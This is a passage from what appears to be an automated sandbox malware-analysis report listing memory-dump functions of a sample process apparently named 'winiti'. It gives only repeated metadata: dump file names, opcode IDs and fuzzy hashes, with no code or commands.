                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                          Function 008E01D4 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                          • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                          • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                          • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                          Function 008E010C Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                          • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                          • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                          • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                          Function 008E0C40 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                          • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                          • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                          • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                          Function 008E10D0 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                          Function 008E1148 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                          • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                          • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                          • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                          Function 008DF8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                          • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                          • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                          • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                          Function 008DF900 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                          Function 008DF938 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                          • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                          • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                          • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                          Function 008E1930 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                          • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                          • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                          • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                          Function 008DFAB8 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                          Function 008DFAD0 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                          Function 008DFA20 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                          • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                          • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                          • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                          Function 008DFA50 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                          • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                          • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                          • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                          Function 008DFBB8 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                          Function 008DFBE8 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                          • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                          • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                          • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                          Function 008DFB50 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                          Function 008DFC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                          Function 008DFC30 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                          • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                          • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                          • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                          Function 008DFC48 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
